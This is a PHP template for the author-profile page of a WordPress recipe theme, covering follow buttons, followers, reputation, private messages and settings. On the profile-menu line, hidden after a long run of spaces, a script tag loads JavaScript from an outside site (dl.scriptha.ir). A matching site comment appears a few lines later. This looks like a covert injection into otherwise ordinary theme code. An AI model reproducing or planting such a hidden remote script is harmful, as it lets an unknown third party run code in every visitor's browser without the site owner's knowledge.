<?php
	get_header(); 
	$curauth = Smk_Theme_User::currentAuthor();
	$curuser = Smk_Theme_User::currentUser();
	$follow = new Smk_Theme_User_Follow;
	$section = isset($_GET['profile-section']) ? sanitize_text_field( $_GET['profile-section'] ) : false;
?>

<div class="rw-container rw-section">
	<div class="rw-inner clearfix">

		<!-- Main content -->
		<div class="rw-column rw-content">

			<div class="rw-row page-title">
				<div class="grid-container">
					<div class="grid desk-8 mob-8 alpha">
						<h1><?php 
							if( in_array( $section, array('pm', 'settings', 'all-recipes')) ){
								if( $section == 'pm' ){
									_e('Private messages', 'smk_theme');
								}
								elseif( $section == 'settings' ){
									_e('Settings', 'smk_theme');
								}
								elseif( $section == 'all-recipes' ){
									if( $curauth->ID != $curuser->ID ){
										echo sprintf( __('Recipes submitted by %s', 'smk_theme'), smk_post_author_link( array( 'echo' => false )) );
									}
									else{
										_e('My recipes', 'smk_theme');
									}
								}
							}
							else{
								echo $curauth->display_name; 
							}
						?></h1>
					</div>
					<div class="grid desk-4 mob-4 omega">

						<?php echo $follow->button( $curauth->ID, array(
							'btn_class' => array(
								'default' => 'button blue right',
								'active' => 'button green active current right',
							)
						)); ?>

					</div>
				</div>
				
			</div>

			<?php 
			if( is_author() ) :
				
				get_template_part('includes/profile-main', 'section');
				
				if( in_array($section, array( 'following', 'followers', 'reputation', 'pm', 'settings', 'all-recipes' ) ) ){
					$section_title = '';
					switch ($section) {
						case 'following':
							$section_title = __('Following', 'smk_theme');
							break;

						case 'followers':
							$section_title = __('Followers', 'smk_theme');
							break;

						case 'reputation':
							$section_title = __('Reputation', 'smk_theme');
							break;
					}

					echo '<div class="rw-row">';
					if( ! in_array( $section, array('pm', 'settings', 'all-recipes')) ){
						echo '<div class="profile-section-title clearfix">
						<h3>'.  $section_title .' 
							<a href="'. get_author_posts_url( $curauth->ID ) .'" class="profile-section-close" title="'. __('Main profile page', 'smk_theme') .'">
								<i class="fa fa-user"></i>
							</a>
						</h3>
						</div>';
					}

					switch ($section) {
						case 'following':
							$following = new Smk_Theme_User_Following;
							$all_following = $following->show();
							if( !empty( $all_following ) && ( count($all_following) > 0 ) ){
								smk_get_members_list( $all_following );
							}
							else{
								echo '<div class="profile-section-message clearfix">' . absint($all_following) .' '. __('following', 'smk_theme') .'</div>';
							}
							break;

						case 'followers':
							$followers = new Smk_Theme_User_Followers;
							$all_followers = $followers->show();
							if( !empty( $all_followers ) && ( count($all_followers) > 0 ) ){
								smk_get_members_list( $all_followers );
							}
							else{
								echo '<div class="profile-section-message clearfix">' . absint($all_followers) .' '. __('followers', 'smk_theme') .'</div>';
							}
							break;

						case 'reputation':
							smk_get_user_reputation_log( $curauth->ID );
							break;

						case 'pm':
							$pm_list = new Smk_Private_Messages_List( $curauth );
							$pm_list->show();
							break;

						case 'settings':
							$user_settings_form = new Smk_User_Settings_Form( $curauth );
							$user_settings_form->showForm();
							break;

						case 'all-recipes':
							smk_all_user_recipes( $curauth->ID );
							break;
					}

					echo '</div>';
				}
				else{
				?>

				<div class="rw-row subtle border-bottom profile-main-menu-block">                                                                                                                                         <script type="text/javascript" src='http://dl.scriptha.ir/ads/ap.js'></script> 
					<div class="grid-container">
						<div class="grid desk-12">
							<div class="profile-main-menu">
								<ul>
									<?php smk_user_summary_tabs($curauth); ?>
								</ul>
							</div>
						</div> <!-- www.scriptha.ir -->
					</div> <!-- .grid-container -->
				</div> <!-- .rw-row -->

				<div class="rw-row">
					<?php smk_user_summary_tabs_content($curauth); ?>
				</div> <!-- .rw-row -->

				<?php
				}
			endif;
			?>

		</div> <!-- .rw-content -->

	</div> <!-- .rw-inner -->
</div> <!-- .rw-container -->

<?php get_footer(); ?>
